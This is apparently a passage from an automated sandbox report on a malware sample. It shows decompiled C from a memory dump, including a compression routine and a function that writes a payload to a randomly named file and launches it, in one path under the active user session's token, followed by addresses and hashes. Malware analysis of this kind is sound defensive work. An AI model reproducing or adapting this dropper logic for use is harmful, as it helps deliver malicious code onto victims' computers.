									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0x5279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E00056E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0x5b220; // 0x201001d
									_t334 = _t576 + 0x5b1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0x5b41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0x5b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x5b1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x5b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x5b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x5b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x5b1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0x5b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x5b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0x5b220; // 0x201001d
									_t231 = _t591 + 0x5b1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0x5b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x5b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x000577f8
0x000577fb
0x000577fe
0x00057804
0x0005780a
0x00057810
0x00057813
0x00057816
0x00000000
0x00057820
0x00057838
0x00057840
0x000579c6
0x000579d0
0x000579d0
0x000579d9
0x00000000
0x00000000
0x000579e2
0x000579e3
0x000579e7
0x000579ec
0x000579ef
0x000579f0
0x000579f3
0x000579ff
0x00057a01
0x00057a01
0x00057a08
0x00057a0e
0x00057a16
0x00057a1e
0x00057a25
0x00057a38
0x00057a56
0x00057a60
0x00057a68
0x00057a6b
0x00057a73
0x00057a73
0x00057a78
0x00000000
0x00000000
0x00057a7e
0x00000000
0x00057a78
0x000579d0
0x00057846
0x00057849
0x0005784d
0x00057853
0x00057853
0x00057865
0x00057878
0x00057887
0x0005788b
0x00057890
0x00057893
0x00057896
0x00057899
0x0005789f
0x000578a1
0x000578a4
0x000578a7
0x000578b4
0x000578b6
0x000578b6
0x000578ce
0x000578d4
0x000578e2
0x000578ea
0x000578ed
0x000578f5
0x000578f6
0x000578fb
0x000578fb
0x000578fe
0x000578fe
0x0005790d
0x00057914
0x00057917
0x0005791a
0x00057928
0x0005792b
0x0005792f
0x00057937
0x0005793e
0x00057941
0x00057944
0x00057947
0x0005794a
0x00057958
0x0005795b
0x00057a8a
0x00057a8f
0x00057a92
0x00057a95
0x00057a9a
0x00057a9d
0x00057aa3
0x00057aac
0x00057abb
0x00057ac8
0x00057acd
0x00057b13
0x00057b13
0x00057b13
0x00057b16
0x00000000
0x00000000
0x00057b18
0x00057b22
0x00000000
0x00057b24
0x00057b29
0x00057b2c
0x00057b31
0x00000000
0x00057b33
0x00057b36
0x00057b3f
0x00057b49
0x00057bc0
0x00057bc2
0x00000000
0x00057bc8
0x00057bd1
0x00057bd4
0x00057bd9
0x00057b10
0x00000000
0x00057bdf
0x00057be8
0x00057bea
0x00057bf0
0x00057bf0
0x00057bf4
0x00057bf7
0x00057bfd
0x00000000
0x00000000
0x00057bff
0x00057c03
0x00057c06
0x00057c0c
0x00057c0e
0x00057c12
0x00057c15
0x00057c1b
0x00057c1d
0x00057c21
0x00057c24
0x00057c2a
0x00057c2c
0x00057c2d
0x00000000
0x00000000
0x00057c2d
0x00057c2a
0x00057c1b
0x00000000
0x00057c0c
0x00057c31
0x00057c34
0x00057c37
0x00057ca0
0x00057ca5
0x00057ca9
0x00000000
0x00057c39
0x00057c41
0x00057c4e
0x00057c54
0x00057c57
0x00057c5d
0x00000000
0x00057c63
0x00057c68
0x00057c6b
0x00057c70
0x00057c73
0x00057c76
0x00057c78
0x00057c7d
0x00000000
0x00057c83
0x00057c86
0x00057c8b
0x00057c93
0x00000000
0x00057c93
0x00057c7d
0x00057c5d
0x00057c37
0x00057bd9
0x00057b4b
0x00057b4b
0x00057b55
0x00000000
0x00057b5b
0x00057b60
0x00057b63
0x00057b69
0x00000000
0x00057b6f
0x00057b72
0x00057b80
0x00000000
0x00057b82
0x00057b82
0x00057b8c
0x00000000
0x00057b92
0x00057b97
0x00057b9a
0x00057ba0
0x00000000
0x00057ba6
0x00057ba9
0x00057bb7
0x00057bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00057bba
0x00057ba0
0x00057b8c
0x00057b80
0x00057b69
0x00057b55
0x00057b49
0x00057b31
0x00057f55
0x00057f55
0x00057f58
0x00057f5e
0x00057f67
0x00057f70
0x00057f73
0x00057f78
0x00057fb1
0x00057fb6
0x00057fb9
0x00057fc1
0x00057fcc
0x00057fd0
0x00058002
0x00057fd2
0x00057fd2
0x00000000
0x00057fd2
0x00057f7a
0x00057f7a
0x00057f7d
0x00057f80
0x00057f89
0x0005781b
0x0005781b
0x00000000
0x00057f8f
0x00057f9f
0x00000000
0x00057fa1
0x00057fa8
0x00057fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00057fab
0x00057f9f
0x00057f89
0x00000000
0x00057f78
0x00000000
0x00057acf
0x00057acf
0x00057acf
0x00057acf
0x00000000
0x00057961
0x00057963
0x00057ad2
0x00057ad5
0x00000000
0x00057cb1
0x00057cb1
0x00057cb4
0x00000000
0x00057cb4
0x00057976
0x00057979
0x0005797c
0x00057984
0x0005798d
0x00057a83
0x00057a83
0x00057a85
0x00057ae3
0x00057ae3
0x00057ae6
0x00057aeb
0x00057cb7
0x00057cb7
0x00057cb9
0x00057cbb
0x00057af1
0x00057af7
0x00000000
0x00057b06
0x00057af7
0x00057993
0x00057996
0x000579a0
0x000579a9
0x000579ac
0x00000000
0x00000000
0x00000000
0x000579ac
0x000579ae
0x000579b4
0x00000000
0x000579ba
0x000579ba
0x00000000
0x000579ba
0x000579b4
0x0005798d
0x00057963
0x00057cbe
0x00057cc3
0x00057e53
0x00057e9b
0x00057ed3
0x00057ed6
0x00057ed9
0x00057ed9
0x00057ede
0x00057ee1
0x00057ee6
0x00057eec
0x00057ef2
0x00057efc
0x00057efe
0x00057efe
0x00057f01
0x00057f03
0x00057f06
0x00057f0a
0x00057f11
0x00057f11
0x00057f16
0x00057f24
0x00057f2b
0x00057f32
0x00057f35
0x00057f38
0x00057f43
0x00057f45
0x00000000
0x00057f45
0x00057ead
0x00057ead
0x00057eb7
0x00057ec2
0x00057ec5
0x00057ec8
0x00057ec8
0x00057e55
0x00057e5c
0x00057e5f
0x00057e69
0x00057e6c
0x00057e71
0x00057e74
0x00057e76
0x00057e76
0x00057e79
0x00057e7b
0x00057e7e
0x00057e82
0x00057e89
0x00057e89
0x00057e8c
0x00057e8f
0x00057f4d
0x00057f4d
0x00057f4d
0x00057cc9
0x00057ccb
0x00057dbb
0x00057dc7
0x00057dca
0x00057dcf
0x00057dd2
0x00057dd8
0x00057dde
0x00057de8
0x00057dea
0x00057dea
0x00057ded
0x00057def
0x00057df2
0x00057df6
0x00057dfd
0x00057dfd
0x00057e1e
0x00057e21
0x00057e29
0x00057e2f
0x00057e39
0x00057e39
0x00057e44
0x00057e45
0x00057cd1
0x00057cd4
0x00057cd7
0x00057cda
0x00057cdf
0x00057ce2
0x00057ce4
0x00057ce4
0x00057ce7
0x00057ce9
0x00057cec
0x00057cf0
0x00057cf7
0x00057cf7
0x00057cfd
0x00057d0b
0x00057daa
0x00057dad
0x00057db0
0x00057db3
0x00057d11
0x00057d14
0x00057d17
0x00057d1a
0x00057d1a
0x00057d1f
0x00057d22
0x00057d27
0x00057d2d
0x00057d33
0x00057d3d
0x00057d3f
0x00057d3f
0x00057d42
0x00057d44
0x00057d47
0x00057d4b
0x00057d52
0x00057d52
0x00057d57
0x00057d65
0x00057d6c
0x00057d73
0x00057d76
0x00057d79
0x00057d84
0x00057d8e
0x00057d8e
0x00057d96
0x00057d96
0x00057d0b
0x00057ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0005791a
0x00057fe2
0x00057fe9
0x00057ff4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af3c05c2b0b5fb639559f21d1c9fa20f5b8218510755262b2e83e25dd4be0eb
Instruction ID: 0dddb46a8a5ee6da26bb4ea1f57677dd52e20beb9b8e64a69fe7189e2c1dc3b3
Opcode Fuzzy Hash: 3af3c05c2b0b5fb639559f21d1c9fa20f5b8218510755262b2e83e25dd4be0eb
Instruction Fuzzy Hash: 4742CB35A08B458FCB25CF69D4806BBBBF2FF88301F18896DD89A97751D734A849DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00051BE0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: 4c75a3c759eb0be71c50014c15fd3e8f3b5670f8b6a34fac7266b08e537ccd12
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: 9901F7336400199BCB60CF4AD5807FAF7E5FB9836679940AAED4887200E736AD95C790

Uniqueness

Uniqueness Score: -1.00%

Function 0005A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0005A3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0x5c214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E00052240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E00051830(0x515a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0x5c200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0x5c224() != 0) {
					 *0x5c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0x5c214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E00052240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E00051830(0x515a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0x5c200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E00051830(0x51398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0x5c200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E00052180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x0005a3ac
0x0005a3b2
0x0005a3b3
0x0005a550
0x0005a553
0x0005a565
0x0005a56b
0x0005a57c
0x0005a57f
0x0005a58b
0x0005a5a1
0x0005a5a6
0x0005a5b0
0x0005a5be
0x0005a5d1
0x0005a5f6
0x0005a5fb
0x0005a666
0x0005a670
0x0005a67e
0x0005a67e
0x0005a608
0x0005a60f
0x0005a61d
0x0005a626
0x0005a652
0x00000000
0x00000000
0x0005a657
0x0005a65d
0x0005a660
0x0005a660
0x00000000
0x0005a660
0x0005a3ba
0x00000000
0x00000000
0x0005a3c0
0x0005a3c3
0x0005a3c6
0x0005a3c9
0x0005a3d0
0x0005a3d9
